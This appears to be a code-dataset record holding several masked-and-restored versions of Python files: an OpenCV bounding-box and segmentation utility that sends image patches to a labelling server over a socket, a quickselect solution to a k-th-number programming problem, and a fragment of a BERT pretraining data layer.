min_area = min(self.area(), other_box.area())\n return (self & 
other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return 
image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\ndef askForLable(patch):\n cv2.imwrite('patch.jpg', patch)\n clientSock = socket(AF_INET, SOCK_STREAM)\n clientSock.connect((TCP_IP, TCP_PORT))\n image = open('patch.jpg', 'rb')\n data = image.read(BUFFER_SIZE)\n while data:\n clientSock.send(data)\n data = image.read(BUFFER_SIZE)\n image.close()\n clientSock.shutdown(SHUT_WR)\n label = clientSock.recv(1024)\n label = label.decode('utf-8')\n return label\n",
"step-5": "import numpy as np\nimport cv2\nfrom pixcel import *\nfrom scipy import ndimage\nimport math\nfrom socket import *\nfrom config import *\nfrom time import time\n\n\ndef find_bounding_boxes(fimage, lables):\n\n # initialize boxes array\n boxes = []\n\n for lable in lables:\n\n # iterate all lables\n\n # filter out image pixels with current lable\n labled = (fimage == lable) + 0\n\n # find indexes\n box = find_bounding_box(labled)\n\n # append found bouding box\n boxes.append(box)\n\n return boxes\n\ndef find_margined_bounding_boxes(fimage, lables, margins):\n\n # initialize boxes array\n boxes = []\n\n for lable in lables:\n\n # iterate all lables\n\n # filter out image pixels with current lable\n labled = (fimage == lable) + 0\n\n # find indexes\n box = find_bounding_box(labled, margins)\n\n # append found bouding box\n boxes.append(box)\n\n return boxes\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n\n # extract indexes of foreground pixels\n indicies = np.array(np.nonzero(binary_matrix + 0))\n\n # get contours\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n\n # return contours\n return [(xs, ys), (xe, ye)]\n\ndef weightFilter(image, lables, weight):\n\n max = 0\n\n weights = np.zeros((lables))\n\n fimage = np.zeros_like(image)\n\n retained_lables = []\n\n for i in range(lables):\n weights[i] = np.sum(np.sum(image == i))\n\n if weights[i] > weights[max]:\n max = i\n\n if weights[i] > weight:\n fimage += np.uint8((image == i) + 0)\n retained_lables.append(i)\n\n fimage -= np.uint8((image == max) + 0)\n\n fimage = np.uint8(fimage * 255)\n\n boxes = []\n\n if (len(retained_lables) > 0):\n\n retained_lables.remove(max)\n boxes = find_bounding_boxes(image.copy(), retained_lables)\n\n return fimage, boxes\n\n\ndef weightFilterMini(image, weight):\n\n image = np.uint8(image)\n # extract contours\n image, contours, hierarchy = 
cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n final_contours = []\n\n for cnt in contours:\n\n if cv2.contourArea(cnt) >= weight:\n\n # add it to final_contours\n final_contours.append(cnt)\n\n fimage = np.zeros((image.shape[:2]), np.uint8)\n cv2.drawContours(fimage, final_contours, -1, 255, -1)\n\n boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes([cv2.boundingRect(cnt) for cnt in final_contours]))\n\n return fimage, boxes\n\ndef weightFilterMargined(image, lables, weight, margins):\n max = 0\n\n weights = np.zeros((lables))\n\n fimage = np.zeros_like(image)\n\n retained_lables = []\n\n for i in range(lables):\n\n weights[i] = np.sum(np.sum(image == i))\n\n if weights[i] > weights[max]:\n max = i\n\n if weights[i] > weight:\n fimage += np.uint8((image == i) + 0)\n retained_lables.append(i)\n\n fimage -= np.uint8(image == max)\n\n fimage = np.uint8(fimage * 255)\n\n boxes = []\n\n if (len(retained_lables) > 0):\n retained_lables.remove(max)\n boxes = find_margined_bounding_boxes(image.copy(), retained_lables, margins)\n\n return fimage, boxes\n\ndef calculatePossiblePadding(box, shape, default = 20):\n\n w_pad = default\n h_pad = default\n\n # dynamic padding\n if default == 0:\n\n rbox = RBox.fromPointBoundingBox(box)\n w_pad = round(0.205 * rbox.w)\n h_pad = round(0.205 * rbox.h)\n\n # extract with and height from shape\n height, width = shape[0:2]\n\n # extract starting, ending x and y from box\n ((x_start, y_start), (x_end, y_end)) = box\n\n # check if is it possible to add certain padding\n # if not add possible padding for all 4 points\n pad_x_start = h_pad\n if y_start - pad_x_start < 0:\n pad_x_start = y_start\n\n pad_y_start = w_pad\n if x_start - pad_y_start < 0:\n pad_y_start = x_start\n\n pad_x_end = w_pad\n if y_end + pad_x_end >= height:\n pad_x_end = height - y_end - 1\n\n pad_y_end = h_pad\n if x_end + pad_y_end >= width:\n pad_y_end = width - x_end - 1\n\n # return resultant padding\n return pad_x_start, 
pad_x_end, pad_y_start, pad_y_end\n\n\ndef findConnectedComponents(frame, threshold = 150, blur_radius = 1.0):\n\n img = frame.copy() # gray-scale image\n\n # smooth the image (to remove small objects)\n imgf = ndimage.gaussian_filter(img, blur_radius)\n\n # find connected components\n labeled, nr_objects = ndimage.label(imgf > threshold)\n\n return labeled, nr_objects\n\n\ndef drawBoundingBox(im, start, end, color):\n cv2.rectangle(im, start, end, color, 1)\n\ndef pwpBasedTracking(image, frame_models, threshold):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7))\n predicted = np.zeros((image.shape[0:2]), np.uint8)\n # FOREACH GIVEN PATCH AND ITS MODEL, APPLY MODEL TO PATCH\n for fm in frame_models:\n\n patch = extractPatch(image, fm[1])\n #patch = cv2.medianBlur(patch, 5)\n mask = np.zeros(patch.shape[0:2], np.uint8)\n res = applyModel(patch, mask, fm[0])\n res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)\n res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)\n res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)\n res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)\n if(len(np.nonzero(res)[0]) > max(fm[2] * threshold, 10) ):\n predicted[fm[1][0]: fm[1][1], fm[1][2]: fm[1][3]] += res;\n\n return predicted\n\ndef extractPatch(im, box):\n\n # extract coordinates\n x1, x2, y1, y2 = box\n\n # extract and return patch\n return im[x1: x2, y1: y2, :]\n\ndef randomColor():\n\n return np.random.randint(0, 255, (1, 3))[0].tolist()\n\ndef performColorProcessing(image, mask, iterations = 1):\n\n # initialize kernel\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n\n return mask\n\ndef killDyingLables(frame, mask, threshold = 0.5):\n\n # get initial weights of lables\n initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)]) 
+ 0.00001\n\n # get final labled frame\n labled_frame = frame * mask\n\n # get final weights\n final_weights = np.array([np.sum(labled_frame == lable) for lable in range(np.amax(frame) + 1)])\n\n # final probabilites\n final_probs = (final_weights/initial_weights) < threshold\n\n for lable in range(len(final_probs)):\n\n dying = final_probs[lable]\n\n # check is lable is dying\n if dying:\n\n # kill lable\n labled_frame -= np.uint8((labled_frame == lable) * lable)\n\n # return final labled frame\n return labled_frame\n\ndef killSmallLables(frame, threshold = 150):\n\n # get initial weights of lables\n initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)])\n\n # final probabilites\n final_probs = initial_weights < threshold\n\n for lable in range(len(final_probs)):\n\n dying = final_probs[lable]\n\n # check is lable is dying\n if dying:\n\n # kill lable\n frame -= np.uint8(np.uint8(frame == lable) * lable)\n\n # return final labled frame\n return frame\n\nclass RBox:\n\n def __init__(self):\n\n # initialize atributes\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n\n # initialize rbox\n rbox = RBox()\n\n # copy attributes\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n\n # return rbox\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n\n # initialize rbox\n rbox = RBox()\n\n # copy attributes\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n\n # return rbox\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n\n # initialize rbox\n rbox = RBox()\n\n # copy attributes\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n\n # return rbox\n return rbox\n\n @staticmethod\n def 
fromPointBoundingBoxes(boxes):\n\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n\n # return array like bounding box\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n\n # return tuple of end points\n return ((self.x, self.y), (self.x + self.w, self.y + self.h))\n\n def area(self):\n\n return self.h * self.w\n\n def __or__(self, other_box):\n\n # initialize resultant box\n rbox = RBox()\n\n # calculate values\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n\n return rbox\n\n def __and__(self, other_box):\n\n # initialize resultant box\n rbox = RBox()\n\n # calculate values\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n\n if rbox.w < 0 or rbox.h < 0:\n\n # reinitailize or make it zero\n rbox = RBox()\n\n return rbox\n\n def similarity(self, other_box):\n\n # (A & B)/(A | B) = (A & B).area/(A.area + B.area - (A & B).area)\n #return (self & other_box).area()/(self.area() + other_box.area() - (self & other_box).area())\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area()/min_area\n\n def __str__(self):\n\n return \"{} {} {} {}\".format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n\n # calculate similarity and return\n return self.similarity(other_box)\n\n def __eq__(self, other):\n\n return self.x == other.x and self.y == other.y and self.w == other.w and self.h == other.h\n\n @staticmethod\n def similarityStats(boxes):\n\n # create matrix out of boxes\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n\n # return similarity matrix\n return sim_mat\n\n @staticmethod\n def 
similarityThreshold(boxes, threshold = 0.8):\n\n # get similarity matrix\n sim_mat = RBox.similarityStats(boxes)\n\n # find thresholded indexes\n ind = np.array(np.nonzero(sim_mat > threshold))\n\n # return in the form of list\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n\n while len(similar_boxes) > 0:\n\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n\n # remove similar boxes\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n\n boxes.append(union)\n\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n\n # get bounding box end points\n (start, end) = self.pointBoundingBox()\n start, end = list(start), list(end)\n\n # check if square flag is on\n if square:\n\n im_h, im_w = image.shape[0:2]\n\n # adjust start and end so that height and width are equal\n if self.h != self.w:\n\n # find bigger size\n if self.h > self.w:\n\n # find difference\n diff = self.h - self.w\n\n if start[0] >= int(diff/2):\n\n start[0] -= math.floor(diff/2)\n diff -= math.floor(diff/2)\n else:\n\n diff -= start[0]\n start[0] = 0\n\n end[0] += diff\n\n if end[0] >= im_w:\n\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n\n # find difference\n diff = self.w - self.h\n\n if start[1] >= int(diff / 2):\n\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n\n diff -= start[1]\n start[1] = 0\n\n end[1] += diff\n\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n\n # return patch\n return image[start[1]: end[1], start[0]: end[0]]\n\n def addPatchtoImage(self, image, patch):\n\n # get bounding box end points\n (start, end) = 
self.pointBoundingBox()\n\n # patch in to image\n image[start[1]: end[1], start[0]: end[0]] = patch\n\n # return image\n return image\n\ndef askForLable(patch):\n\n # write an image to send\n cv2.imwrite(\"patch.jpg\", patch)\n\n # setup client socket\n clientSock = socket(AF_INET, SOCK_STREAM)\n clientSock.connect((TCP_IP, TCP_PORT))\n\n # open image\n image = open(\"patch.jpg\", 'rb')\n\n # read bytes equal to buffer size\n data = image.read(BUFFER_SIZE)\n\n # while image still has data\n while (data):\n\n # send data to server\n clientSock.send(data)\n\n # read more data if available\n data = image.read(BUFFER_SIZE)\n\n # close file\n image.close()\n\n # signal server to end data stream\n clientSock.shutdown(SHUT_WR)\n\n # recieved lable as binary data from server and convert it to string\n label = clientSock.recv(1024)\n label = label.decode(\"utf-8\")\n\n return label\n",
"step-ids": [
23,
26,
28,
37,
41
]
}
|
[
23,
26,
28,
37,
41
] |
<|reserved_special_token_0|>
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
<|reserved_special_token_0|>
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.setrecursionlimit(10 ** 6)
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
if __name__ == '__main__':
N, K = read_list_int()
A = read_list_int()
print(get_kth_number(A, K))
<|reserved_special_token_1|>
import sys
sys.setrecursionlimit(10 ** 6)
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[
sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k - 1 == pivot_index:
return nums[k - 1]
elif k - 1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
return quick_select(nums, 0, len(nums) - 1, k)
if __name__ == '__main__':
N, K = read_list_int()
A = read_list_int()
print(get_kth_number(A, K))
<|reserved_special_token_1|>
# Title: K번째 수
# Link: https://www.acmicpc.net/problem/11004
import sys
sys.setrecursionlimit(10 ** 6)
def read_list_int():
return list(map(int, sys.stdin.readline().strip().split(' ')))
def read_single_int():
return int(sys.stdin.readline().strip())
def selection_sort(nums, k):
sorted_index = 0
while True:
minimum = 9999999999
min_index = 0
for i, n in enumerate(nums[sorted_index:], sorted_index):
if n < minimum:
minimum = n
min_index = i
k -= 1
if k == 0:
return minimum
nums[sorted_index], nums[min_index] = nums[min_index], nums[sorted_index]
sorted_index += 1
def partition(nums, left, right, pivot_index):
pivot_value = nums[pivot_index]
nums[pivot_index], nums[right] = nums[right], nums[pivot_index]
store_index = left
for i in range(left, right):
if nums[i] < pivot_value:
nums[store_index], nums[i] = nums[i], nums[store_index]
store_index += 1
nums[right], nums[store_index] = nums[store_index], nums[right]
return store_index
def quick_select(nums, left, right, k):
while True:
if left == right:
return nums[left]
pivot_index = right
pivot_index = partition(nums, left, right, pivot_index)
if k-1 == pivot_index:
return nums[k-1]
elif k-1 < pivot_index:
right = pivot_index - 1
else:
left = pivot_index + 1
def get_kth_number(nums, k):
# TLE
# selection_sort(nums, k)
return quick_select(nums, 0, len(nums)-1, k)
if __name__ == '__main__':
N, K = read_list_int()
A = read_list_int()
print(get_kth_number(A, K))
|
flexible
|
{
"blob_id": "f4ab6df8efc334fa338ade7deecd36d8cd859e96",
"index": 4174,
"step-1": "<mask token>\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\n<mask token>\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\ndef read_single_int():\n return int(sys.stdin.readline().strip())\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.setrecursionlimit(10 ** 6)\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\ndef read_single_int():\n return int(sys.stdin.readline().strip())\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\nif __name__ == '__main__':\n N, K = read_list_int()\n A = read_list_int()\n print(get_kth_number(A, K))\n",
"step-4": "import sys\nsys.setrecursionlimit(10 ** 6)\n\n\ndef read_list_int():\n return list(map(int, sys.stdin.readline().strip().split(' ')))\n\n\ndef read_single_int():\n return int(sys.stdin.readline().strip())\n\n\ndef selection_sort(nums, k):\n sorted_index = 0\n while True:\n minimum = 9999999999\n min_index = 0\n for i, n in enumerate(nums[sorted_index:], sorted_index):\n if n < minimum:\n minimum = n\n min_index = i\n k -= 1\n if k == 0:\n return minimum\n nums[sorted_index], nums[min_index] = nums[min_index], nums[\n sorted_index]\n sorted_index += 1\n\n\ndef partition(nums, left, right, pivot_index):\n pivot_value = nums[pivot_index]\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\n store_index = left\n for i in range(left, right):\n if nums[i] < pivot_value:\n nums[store_index], nums[i] = nums[i], nums[store_index]\n store_index += 1\n nums[right], nums[store_index] = nums[store_index], nums[right]\n return store_index\n\n\ndef quick_select(nums, left, right, k):\n while True:\n if left == right:\n return nums[left]\n pivot_index = right\n pivot_index = partition(nums, left, right, pivot_index)\n if k - 1 == pivot_index:\n return nums[k - 1]\n elif k - 1 < pivot_index:\n right = pivot_index - 1\n else:\n left = pivot_index + 1\n\n\ndef get_kth_number(nums, k):\n return quick_select(nums, 0, len(nums) - 1, k)\n\n\nif __name__ == '__main__':\n N, K = read_list_int()\n A = read_list_int()\n print(get_kth_number(A, K))\n",
"step-5": "# Title: K번째 수\r\n# Link: https://www.acmicpc.net/problem/11004\r\n\r\nimport sys\r\n\r\nsys.setrecursionlimit(10 ** 6)\r\n\r\n\r\ndef read_list_int():\r\n return list(map(int, sys.stdin.readline().strip().split(' ')))\r\n\r\n\r\ndef read_single_int():\r\n return int(sys.stdin.readline().strip())\r\n\r\n\r\ndef selection_sort(nums, k):\r\n sorted_index = 0\r\n while True:\r\n minimum = 9999999999\r\n min_index = 0\r\n for i, n in enumerate(nums[sorted_index:], sorted_index):\r\n if n < minimum:\r\n minimum = n\r\n min_index = i\r\n k -= 1\r\n if k == 0:\r\n return minimum\r\n nums[sorted_index], nums[min_index] = nums[min_index], nums[sorted_index]\r\n sorted_index += 1\r\n\r\n\r\ndef partition(nums, left, right, pivot_index):\r\n pivot_value = nums[pivot_index]\r\n nums[pivot_index], nums[right] = nums[right], nums[pivot_index]\r\n store_index = left\r\n for i in range(left, right):\r\n if nums[i] < pivot_value:\r\n nums[store_index], nums[i] = nums[i], nums[store_index]\r\n store_index += 1\r\n nums[right], nums[store_index] = nums[store_index], nums[right]\r\n return store_index\r\n\r\n\r\ndef quick_select(nums, left, right, k):\r\n while True:\r\n if left == right:\r\n return nums[left]\r\n pivot_index = right\r\n pivot_index = partition(nums, left, right, pivot_index)\r\n if k-1 == pivot_index:\r\n return nums[k-1]\r\n elif k-1 < pivot_index:\r\n right = pivot_index - 1\r\n else:\r\n left = pivot_index + 1\r\n\r\n\r\ndef get_kth_number(nums, k):\r\n # TLE\r\n # selection_sort(nums, k)\r\n return quick_select(nums, 0, len(nums)-1, k)\r\n\r\n\r\nif __name__ == '__main__':\r\n N, K = read_list_int()\r\n A = read_list_int()\r\n print(get_kth_number(A, K))\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class BertPretrainingDataLayer(DataLayerNM):
<|reserved_special_token_0|>
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
<|reserved_special_token_0|>
@property
def data_iterator(self):
return None
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BertPretrainingDataLayer(DataLayerNM):
<|reserved_special_token_0|>
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15, **kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device('cuda' if self.placement in [DeviceType
.GPU, DeviceType.AllGpu] else 'cpu')
self._dataset = BertPretrainingDataset(tokenizer=tokenizer, dataset
=dataset, name=name, sentence_indices_filename=
sentence_indices_filename, max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
